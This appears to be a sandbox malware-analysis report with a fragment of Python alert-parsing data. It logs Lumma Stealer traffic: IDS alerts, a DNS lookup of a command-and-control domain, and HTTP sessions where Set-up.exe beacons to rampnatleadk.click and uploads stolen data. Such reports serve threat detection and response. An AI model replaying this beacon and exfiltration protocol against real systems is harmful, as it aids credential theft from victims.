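KNOWN_IPS = frozenset({"192.168.2.4", "172.67.139.144", "104.21.79.9"})
ROWS = [
    "2025-01-12T15:20:13.124090+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732172.67.139.144443TCP",
    "2025-01-12T15:20:14.149231+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449732172.67.139.144443TCP",
    "2025-01-12T15:20:14.149231+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449732172.67.139.144443TCP",
    "2025-01-12T15:20:14.615838+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733172.67.139.144443TCP",
    "2025-01-12T15:20:15.116755+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449733172.67.139.144443TCP",
    "2025-01-12T15:20:15.116755+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449733172.67.139.144443TCP",
    "2025-01-12T15:20:15.818900+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734172.67.139.144443TCP",
    "2025-01-12T15:20:17.106777+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735172.67.139.144443TCP",
    "2025-01-12T15:20:17.580047+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449735172.67.139.144443TCP",
    "2025-01-12T15:20:18.280695+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736172.67.139.144443TCP",
    "2025-01-12T15:20:21.757785+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737172.67.139.144443TCP",
    "2025-01-12T15:20:23.442162+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741172.67.139.144443TCP",
    "2025-01-12T15:20:26.618370+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745172.67.139.144443TCP",
    "2025-01-12T15:20:27.974091+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449745172.67.139.144443TCP",
]
```

Run as `summarize(ROWS, KNOWN_IPS)`; without the known-address hint `parse_alert` returns None for every row, which is the point: a flattened report is not a reliable IOC source on its own, and the DNS answers and session table in the same report are what make the flows recoverable. Note that signatures containing digits ("Win32", "M2") are handled by the lazy signature group, which only stops at a digit that is directly followed by a dotted IP.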
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 12, 2025 15:20:12.646370888 CET | 49732 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:12.646393061 CET | 443 | 49732 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:12.646457911 CET | 49732 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:12.648998976 CET | 49732 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:12.649012089 CET | 443 | 49732 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:13.123961926 CET | 443 | 49732 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:13.124089956 CET | 49732 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:13.160512924 CET | 49732 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:13.160533905 CET | 443 | 49732 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:13.160914898 CET | 443 | 49732 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:13.207465887 CET | 49732 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:13.384536982 CET | 49732 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:13.384556055 CET | 49732 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:13.384658098 CET | 443 | 49732 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:14.149202108 CET | 443 | 49732 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:14.149274111 CET | 443 | 49732 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:14.149327040 CET | 49732 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:14.150636911 CET | 49732 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:14.150649071 CET | 443 | 49732 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:14.150659084 CET | 49732 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:14.150662899 CET | 443 | 49732 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:14.158315897 CET | 49733 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:14.158409119 CET | 443 | 49733 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:14.158504009 CET | 49733 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:14.158849001 CET | 49733 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:14.158888102 CET | 443 | 49733 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:14.615753889 CET | 443 | 49733 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:14.615838051 CET | 49733 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:14.616894960 CET | 49733 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:14.616919994 CET | 443 | 49733 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:14.617142916 CET | 443 | 49733 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:14.618093014 CET | 49733 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:14.618134022 CET | 49733 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:14.618180037 CET | 443 | 49733 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:15.116544962 CET | 443 | 49733 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:15.116594076 CET | 443 | 49733 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:15.116625071 CET | 443 | 49733 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:15.116652012 CET | 49733 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:15.116708994 CET | 443 | 49733 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:15.116748095 CET | 49733 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:15.116770029 CET | 49733 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:15.116925001 CET | 443 | 49733 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:15.116970062 CET | 49733 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:15.116971016 CET | 443 | 49733 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:15.116985083 CET | 443 | 49733 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:15.117026091 CET | 49733 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:15.117450953 CET | 443 | 49733 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:15.160599947 CET | 49733 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:15.203063965 CET | 443 | 49733 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:15.203140020 CET | 443 | 49733 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:15.203164101 CET | 443 | 49733 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:15.203202009 CET | 49733 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:15.203226089 CET | 443 | 49733 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:15.203254938 CET | 443 | 49733 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:15.203284979 CET | 49733 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:15.203326941 CET | 49733 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:15.203466892 CET | 49733 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:15.203500032 CET | 443 | 49733 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:15.203524113 CET | 49733 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:15.203536987 CET | 443 | 49733 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:15.362643003 CET | 49734 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:15.362678051 CET | 443 | 49734 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:15.362734079 CET | 49734 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:15.362977028 CET | 49734 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:15.362987995 CET | 443 | 49734 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:15.818819046 CET | 443 | 49734 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:15.818900108 CET | 49734 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:15.842443943 CET | 49734 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:15.842457056 CET | 443 | 49734 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:15.842705965 CET | 443 | 49734 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:15.865037918 CET | 49734 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:15.865148067 CET | 49734 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:15.865175962 CET | 443 | 49734 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:15.865225077 CET | 49734 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:15.865231037 CET | 443 | 49734 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:16.496027946 CET | 443 | 49734 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:16.496107101 CET | 443 | 49734 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:16.496201992 CET | 49734 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:16.496265888 CET | 49734 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:16.496277094 CET | 443 | 49734 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:16.623943090 CET | 49735 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:16.624032021 CET | 443 | 49735 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:16.624114037 CET | 49735 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:16.624571085 CET | 49735 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:16.624624014 CET | 443 | 49735 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:17.106558084 CET | 443 | 49735 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:17.106776953 CET | 49735 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:17.108421087 CET | 49735 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:17.108450890 CET | 443 | 49735 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:17.109297037 CET | 443 | 49735 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:17.110527039 CET | 49735 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:17.110642910 CET | 49735 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:17.110676050 CET | 443 | 49735 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:17.580065966 CET | 443 | 49735 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:17.580406904 CET | 443 | 49735 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:17.580593109 CET | 49735 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:17.581332922 CET | 49735 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:17.581372023 CET | 443 | 49735 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:17.792392015 CET | 49736 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:17.792484045 CET | 443 | 49736 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:17.792603016 CET | 49736 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:17.792871952 CET | 49736 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:17.792912006 CET | 443 | 49736 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:18.280369997 CET | 443 | 49736 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:18.280694962 CET | 49736 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:18.292406082 CET | 49736 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:18.292455912 CET | 443 | 49736 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:18.293528080 CET | 443 | 49736 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:18.337877989 CET | 49736 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:18.338059902 CET | 49736 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:18.338161945 CET | 443 | 49736 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:18.338233948 CET | 49736 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:18.338249922 CET | 443 | 49736 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:20.436995983 CET | 443 | 49736 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:20.437235117 CET | 443 | 49736 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:20.437433958 CET | 49736 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:20.437515974 CET | 49736 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:20.437555075 CET | 443 | 49736 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:21.261101007 CET | 49737 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:21.261133909 CET | 443 | 49737 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:21.261192083 CET | 49737 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:21.261594057 CET | 49737 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:21.261606932 CET | 443 | 49737 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:21.757654905 CET | 443 | 49737 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:21.757785082 CET | 49737 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:21.758768082 CET | 49737 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:21.758785009 CET | 443 | 49737 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:21.759728909 CET | 443 | 49737 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:21.761069059 CET | 49737 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:21.761145115 CET | 49737 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:21.761149883 CET | 443 | 49737 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:22.233613968 CET | 443 | 49737 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:22.233850956 CET | 443 | 49737 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:22.234071016 CET | 49737 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:22.234559059 CET | 49737 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:22.234571934 CET | 443 | 49737 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:22.851324081 CET | 49741 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:22.851367950 CET | 443 | 49741 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:22.851866961 CET | 49741 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:22.851867914 CET | 49741 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:22.851907969 CET | 443 | 49741 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:23.442008018 CET | 443 | 49741 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:23.442162037 CET | 49741 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:23.443069935 CET | 49741 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:23.443084002 CET | 443 | 49741 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:23.443434954 CET | 443 | 49741 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:23.455646038 CET | 49741 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:23.456299067 CET | 49741 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:23.456345081 CET | 443 | 49741 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:23.456624985 CET | 49741 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:23.456669092 CET | 443 | 49741 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:23.456796885 CET | 49741 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:23.456897974 CET | 443 | 49741 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:23.457047939 CET | 49741 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:23.457088947 CET | 443 | 49741 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:23.457264900 CET | 49741 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:23.457313061 CET | 443 | 49741 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:23.457500935 CET | 49741 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:23.457550049 CET | 443 | 49741 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:23.457576036 CET | 49741 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:23.457755089 CET | 49741 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:23.457815886 CET | 49741 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:23.465557098 CET | 443 | 49741 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:23.465815067 CET | 49741 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:23.465858936 CET | 443 | 49741 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:23.465904951 CET | 49741 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:23.466001987 CET | 49741 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:23.466057062 CET | 49741 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:23.467006922 CET | 443 | 49741 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:23.467138052 CET | 49741 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:23.467179060 CET | 443 | 49741 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:26.137933969 CET | 443 | 49741 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:26.138001919 CET | 443 | 49741 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:26.138113976 CET | 49741 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:26.138202906 CET | 49741 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:26.138241053 CET | 443 | 49741 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:26.164457083 CET | 49745 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:26.164542913 CET | 443 | 49745 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:26.164628029 CET | 49745 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:26.165004015 CET | 49745 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:26.165039062 CET | 443 | 49745 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:26.618268967 CET | 443 | 49745 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:26.618370056 CET | 49745 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:26.619371891 CET | 49745 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:26.619401932 CET | 443 | 49745 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:26.619631052 CET | 443 | 49745 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:26.626986980 CET | 49745 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:26.627029896 CET | 49745 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:26.627074003 CET | 443 | 49745 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:27.973925114 CET | 443 | 49745 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:27.973984003 CET | 443 | 49745 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:27.974066973 CET | 49745 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:27.974219084 CET | 49745 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:27.974219084 CET | 49745 | 443 | 192.168.2.4 | 172.67.139.144
Jan 12, 2025 15:20:27.974261999 CET | 443 | 49745 | 172.67.139.144 | 192.168.2.4
Jan 12, 2025 15:20:27.974289894 CET | 443 | 49745 | 172.67.139.144 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 12, 2025 15:20:12.619774103 CET | 53308 | 53 | 192.168.2.4 | 1.1.1.1
Jan 12, 2025 15:20:12.641587973 CET | 53 | 53308 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 12, 2025 15:20:12.619774103 CET | 192.168.2.4 | 1.1.1.1 | 0x3b42 | Standard query (0) | rampnatleadk.click | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 12, 2025 15:20:12.641587973 CET | 1.1.1.1 | 192.168.2.4 | 0x3b42 | No error (0) | rampnatleadk.click | (none) | 172.67.139.144 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 15:20:12.641587973 CET | 1.1.1.1 | 192.168.2.4 | 0x3b42 | No error (0) | rampnatleadk.click | (none) | 104.21.79.9 | A (IP address) | IN (0x0001) | false
• rampnatleadk.click
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49732 | 172.67.139.144 | 443 | 7104 | C:\Users\user\Desktop\Set-up.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 14:20:13 UTC | 265 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: rampnatleadk.click
2025-01-12 14:20:13 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2025-01-12 14:20:14 UTC | 1134 | IN | HTTP/1.1 200 OK
Date: Sun, 12 Jan 2025 14:20:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=kfb340jam09oabo0l41ttj19nl; expires=Thu, 08 May 2025 08:06:52 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nNzkfXyilkcEScPZwsSJhVwp51G9pHnoBRrFS%2BkiSuc8xyIBKNK%2FxXbKPn%2FZ8dBLfbSyB2bIkAceqMSL81xNrdBEXsHEryvsQRYMQ7%2FO2ivsUUYVu8iKv%2BHBH%2ByAJXtGWhIHKXI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 900dc937ffec43ed-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1649&min_rtt=1638&rtt_var=636&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=909&delivery_rate=1690793&cwnd=210&unsent_bytes=0&cid=a4b596ef4a504d50&ts=1037&x=0"
2025-01-12 14:20:14 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2025-01-12 14:20:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49733 | 172.67.139.144 | 443 | 7104 | C:\Users\user\Desktop\Set-up.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 14:20:14 UTC | 266 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 49
Host: rampnatleadk.click
2025-01-12 14:20:14 UTC | 49 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 66 42 6b 43 6d 75 2d 2d 6e 65 78 74 32 6b 24 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=fBkCmu--next2k$&j=
2025-01-12 14:20:15 UTC | 1131 | IN | HTTP/1.1 200 OK
Date: Sun, 12 Jan 2025 14:20:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=r60d42ma807p9adsjlmjl1ur1h; expires=Thu, 08 May 2025 08:06:53 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VPu6zSGqRuzkjqgG%2FyM7etndCd0SdMbhSZde%2BNNgYR051qzVs%2FPQq6mWfTGj%2BlOz3DlCWx5WYTxFVpF9XFvXPv%2Fuq0aWFi8iZCV7EaugyzJbDhwy29wKbTffyDUyt2bvX79VObA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 900dc93fe95fc340-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2085&min_rtt=1640&rtt_var=933&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=951&delivery_rate=1780487&cwnd=146&unsent_bytes=0&cid=edf0596acbc7c795&ts=505&x=0"
2025-01-12 14:20:15 UTC | 238 | IN | (chunked response body, base64-encoded; raw hex and encoded text omitted)
2025-01-12 14:20:15 UTC | 901 | IN | (chunked response body, base64-encoded; raw hex and encoded text omitted)
2025-01-12 14:20:15 UTC | 1369 | IN | (chunked response body, base64-encoded; raw hex and encoded text omitted)
2025-01-12 14:20:15 UTC | 1369 | IN | (chunked response body, base64-encoded; raw hex and encoded text omitted)
2025-01-12 14:20:15 UTC | 1369 | IN | (chunked response body, base64-encoded; raw hex and encoded text omitted)
2025-01-12 14:20:15 UTC | 1369 | IN | (chunked response body, base64-encoded; raw hex and encoded text omitted)
2025-01-12 14:20:15 UTC | 1369 | IN | (chunked response body, base64-encoded; raw hex and encoded text omitted)
2025-01-12 14:20:15 UTC | 1369 | IN | (chunked response body, base64-encoded; raw hex and encoded text omitted)
2025-01-12 14:20:15 UTC | 1369 | IN | (chunked response body, base64-encoded; raw hex and encoded text omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49734 | 172.67.139.144 | 443 | 7104 | C:\Users\user\Desktop\Set-up.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 14:20:15 UTC | 279 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=3XEH7KGCEF7JX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 18135
Host: rampnatleadk.click
2025-01-12 14:20:15 UTC | 15331 | OUT | (raw hex omitted)
